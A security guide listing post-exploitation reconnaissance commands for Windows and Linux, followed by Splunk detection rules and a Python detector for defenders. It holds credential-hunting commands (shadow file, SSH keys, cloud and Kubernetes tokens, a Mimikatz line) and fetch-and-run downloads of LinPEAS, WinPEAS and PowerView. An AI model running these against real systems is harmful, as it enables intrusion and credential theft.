Penetration testers and red teams spend a lot of time on post-exploitation reconnaissance — figuring out where they are, who they are, and what they can access. These same tools and techniques are used by real attackers, so defenders need to understand exactly what information an attacker gathers after gaining access. This guide covers the essential reconnaissance commands for both Windows and Linux environments.
Windows Post-Exploitation Reconnaissance
Basic System Information
# System overview
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
hostname
whoami /all # Current user + all privileges and groups
echo %COMPUTERNAME%
echo %USERDOMAIN%
# Check current user privileges
whoami /priv # Look for SeDebugPrivilege, SeImpersonatePrivilege (privilege escalation opportunities)
net user %USERNAME%
net localgroup Administrators
# Check if we are on a domain
net config workstation | findstr /i "domain logon" # findstr ORs space-separated strings; it has no | alternation
nltest /domain_trusts
# Running processes (looking for AV/EDR products to evade)
tasklist /SVC # List processes with services
tasklist | findstr /i "defender crowdstrike carbon cylance sentinel tanium"
Get-Process | Where-Object {$_.Name -match "av|defense|protect|guard|sensor|agent"}
Network Reconnaissance
# Network configuration
ipconfig /all # All interfaces, DNS servers, DHCP info
route print # Routing table (identify network segments)
arp -a # ARP cache (recently communicated hosts)
netstat -ano # All connections with PIDs
netstat -ano | findstr LISTENING # Find listening services
# Find other live hosts in subnet (using built-in ping)
for /L %i in (1,1,254) do @ping -n 1 -w 100 192.168.1.%i | findstr "Reply"
# PowerShell network scanner
1..254 | ForEach-Object {$ip = "192.168.1.$_"; if (Test-Connection -ComputerName $ip -Count 1 -Quiet -TimeoutSeconds 1) {Write-Host "ALIVE: $ip"}} # -TimeoutSeconds needs PowerShell 7+
# Find domain controllers
nslookup -type=srv _ldap._tcp.dc._msdcs.DOMAIN.LOCAL
nltest /dclist:DOMAIN.LOCAL
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers
Active Directory Enumeration
# Domain reconnaissance using built-in tools only
net user /domain # All domain users
net group "Domain Admins" /domain # Domain admin members
net group "Enterprise Admins" /domain # Enterprise admin members
net accounts /domain # Password policy
# Find all domain computers
net group "Domain Computers" /domain
# Find users with admin access to specific machine
net localgroup Administrators \\COMPUTERNAME
# PowerShell: Enumerate AD (needs only the ActiveDirectory RSAT module, no third-party tools)
# Find all users with SPN (Kerberoastable)
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName | Select SamAccountName, ServicePrincipalName
# Find accounts with password never expires (common service account weakness)
Get-ADUser -Filter {PasswordNeverExpires -eq $true} -Properties PasswordLastSet | Select SamAccountName, PasswordLastSet
# Find inactive accounts (potential for reuse)
$cutoff = (Get-Date).AddDays(-90)
Get-ADUser -Filter {LastLogonDate -lt $cutoff -and Enabled -eq $true} -Properties LastLogonDate | Select SamAccountName, LastLogonDate
Credential Hunting on Windows
# Search for password files
dir /s /b C:\ | findstr /i "password passwd credential secret config"
findstr /si password *.txt *.ini *.config *.xml 2>nul
# Check for credentials in common locations
type C:\Windows\Panther\Unattend\Unattended.xml # Windows setup files
type C:\inetpub\wwwroot\web.config # IIS config (DB passwords)
type "C:\Program Files\FileZilla Server\FileZilla Server.xml"
reg query HKLM /f password /t REG_SZ /s # Registry passwords
reg query HKCU\Software\SimonTatham\PuTTY\Sessions # PuTTY saved sessions (may contain passwords)
# Search for SSH keys
dir /s /b %USERPROFILE%\.ssh
dir /s /b C:\Users /A | findstr /i "id_rsa id_dsa .pem .key"
# Check Windows Credential Manager
cmdkey /list # List stored credentials
# Retrieve via Mimikatz:
# vault::cred /patch
Linux Post-Exploitation Reconnaissance
System and User Information
# System overview
id # Current user/groups
whoami
uname -a # Kernel version (look for privilege escalation)
cat /etc/os-release # OS info
hostname
env # Environment variables (tokens, passwords?)
cat /proc/version
# Check sudo rights (key privilege escalation path)
sudo -l # What can we run as root?
cat /etc/sudoers 2>/dev/null
find / -perm -4000 -type f 2>/dev/null # SUID binaries (privesc)
find / -perm -2000 -type f 2>/dev/null # SGID binaries
# Interesting files
cat /etc/passwd # All user accounts (look for non-standard users)
cat /etc/shadow 2>/dev/null # Password hashes (if we can read it)
cat /etc/crontab # Scheduled tasks (privesc through writable scripts)
ls -la /etc/cron.*
# Check history files for credentials
cat ~/.bash_history
cat ~/.zsh_history
cat ~/.mysql_history
find / -name "*.bash_history" 2>/dev/null
Network Reconnaissance on Linux
# Network information
ip addr show
ip route show
cat /etc/resolv.conf # DNS servers
netstat -tulnp 2>/dev/null || ss -tulnp # Listening services
arp -a # ARP cache
# Internal network discovery
for i in {1..254}; do (ping -c 1 -W 1 192.168.1.$i &>/dev/null && echo "ALIVE: 192.168.1.$i") & done; wait
# Check for internal services
cat /etc/hosts # Local DNS entries (reveals internal hostnames)
netstat -tulnp | grep -E "127|::1" # Localhost-only services (often more vulnerable); -E for alternation
Linux Credential Hunting
# Find password files
find / -name "*.conf" -exec grep -lE "password|passwd" {} \; 2>/dev/null
grep -r "password" /var/www/html/ 2>/dev/null # Web app config files
find / -name "*.env" 2>/dev/null # Environment files with secrets
# Database credentials
cat /var/www/html/wp-config.php # WordPress DB credentials
find / -name "database.yml" 2>/dev/null # Rails database config
cat /opt/app/config/config.yml 2>/dev/null
# SSH keys
find / -name "id_rsa" -o -name "id_dsa" -o -name "id_ed25519" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null # Who can SSH here?
cat ~/.ssh/known_hosts # Systems this machine connects to
# Docker/Kubernetes secrets
cat /run/secrets/* 2>/dev/null # Docker Swarm secrets
cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null # K8s service account
# AWS credentials on the machine
cat ~/.aws/credentials
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ # AWS instance metadata
Automated Enumeration Tools
# LinPEAS: Linux Privilege Escalation Awesome Script
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Highlights privilege escalation paths in color: red = critical
# WinPEAS: Windows equivalent
certutil.exe -urlcache -f https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany.exe winpeas.exe
.\winpeas.exe
# PowerView: AD enumeration (PowerShell)
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')
Get-Domain
Get-DomainUser -SPN
Get-DomainGroupMember "Domain Admins" -Recurse
Find-LocalAdminAccess # Find all machines where current user is local admin
How Defenders Detect Post-Exploitation Recon
# Sysmon Event ID 1: Process creation - flag recon commands
# Rule: Any of these commands executed by non-admin user
# whoami /all, net group "Domain Admins" /domain, nltest, nslookup -type=srv
# Splunk: Detect LOLBin recon chain
index=windows EventCode=1
| search CommandLine IN ("*whoami /all*","*net user /domain*","*net group*domain*","*nltest*","*arp -a*")
| stats count by host user CommandLine | sort -count
# Detect LinPEAS/WinPEAS execution
index=windows EventCode=1 (CommandLine="*peass*" OR CommandLine="*winpeas*" OR CommandLine="*linpeas*")
# Detect PowerView usage
index=windows EventCode=4104
| search ScriptBlockText="*Get-DomainUser*" OR ScriptBlockText="*Find-LocalAdminAccess*" OR ScriptBlockText="*Invoke-Kerberoast*"
# Alert on LSASS access (credential dumping always follows recon)
index=windows EventCode=10 TargetImage="*lsass.exe"
| search NOT SourceImage IN ("C:\Windows\System32\*","C:\Windows\SysWOW64\*")
Understanding attacker reconnaissance is fundamental to threat hunting and detection engineering. Every command in this guide generates specific, detectable log entries. The goal is not to make recon impossible — it is to make it loud enough that your SIEM catches it before the attacker reaches their objective. Map every technique here to a MITRE ATT&CK ID, build a Sigma rule, and add it to your detection library.
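As an added example (not part of the original guide), the three Splunk rules above expressed as a small Python detector over constructed Sysmon-style events: the LOLBin recon chain counted per host and user, PowerView cmdlet names in Event ID 4104 script blocks, and lsass.exe handle opens from an image outside System32/SysWOW64. The event field names and the chain threshold of three are assumptions.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style events for demonstration; field names are assumptions, not real log data.
SAMPLE_EVENTS = [
    {"EventCode": 1, "host": "WS01", "user": "CORP\\jdoe", "CommandLine": "whoami /all"},
    {"EventCode": 1, "host": "WS01", "user": "CORP\\jdoe", "CommandLine": 'net group "Domain Admins" /domain'},
    {"EventCode": 1, "host": "WS01", "user": "CORP\\jdoe", "CommandLine": "nltest /dclist:CORP.LOCAL"},
    {"EventCode": 1, "host": "WS02", "user": "CORP\\helpdesk", "CommandLine": "arp -a"},
    {"EventCode": 4104, "host": "WS01", "user": "CORP\\jdoe", "ScriptBlockText": "Get-DomainUser -SPN"},
    {"EventCode": 10, "host": "WS01", "user": "CORP\\jdoe", "SourceImage": "C:\\Users\\jdoe\\Downloads\\tool.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe"},
    {"EventCode": 10, "host": "WS03", "user": "NT AUTHORITY\\SYSTEM", "SourceImage": "C:\\Windows\\System32\\svchost.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe"},
]

# The substrings the Splunk wildcards match, as case-insensitive regexes.
RECON_CMDS = [re.compile(p, re.I) for p in (
    r"whoami /all", r"net user /domain", r"net group .*domain", r"\bnltest\b",
    r"arp -a", r"nslookup -type=srv", r"linpeas|winpeas|peass")]
POWERVIEW = re.compile(r"Get-DomainUser|Find-LocalAdminAccess|Invoke-Kerberoast", re.I)
TRUSTED_SOURCE = re.compile(r"^C:\\Windows\\(System32|SysWOW64)\\", re.I)

def recon_counts(events):
    """`stats count by host user` over Event ID 1 command lines that match a recon pattern."""
    counts = defaultdict(int)
    for ev in events:
        if ev.get("EventCode") == 1 and any(p.search(ev["CommandLine"]) for p in RECON_CMDS):
            counts[(ev["host"], ev["user"])] += 1
    return dict(counts)

def powerview_hits(events):
    """Event ID 4104 script blocks containing a PowerView cmdlet name."""
    return [(ev["host"], ev["user"]) for ev in events
            if ev.get("EventCode") == 4104 and POWERVIEW.search(ev["ScriptBlockText"])]

def untrusted_lsass_access(events):
    """Event ID 10 handles to lsass.exe opened by an image outside System32/SysWOW64."""
    return [(ev["host"], ev["SourceImage"]) for ev in events
            if ev.get("EventCode") == 10 and ev["TargetImage"].lower().endswith("lsass.exe")
            and not TRUSTED_SOURCE.match(ev["SourceImage"])]

def alerts(events, chain_threshold=3):
    """One line per finding; a host/user only alerts on the recon chain once it reaches the threshold."""
    out = [f"RECON_CHAIN host={h} user={u} count={n}"
           for (h, u), n in recon_counts(events).items() if n >= chain_threshold]
    out += [f"POWERVIEW host={h} user={u}" for h, u in powerview_hits(events)]
    out += [f"LSASS_ACCESS host={h} source={s}" for h, s in untrusted_lsass_access(events)]
    return out
```

The single `arp -a` on WS02 stays below the threshold, which is the point of counting per host and user rather than alerting on each LOLBin hit.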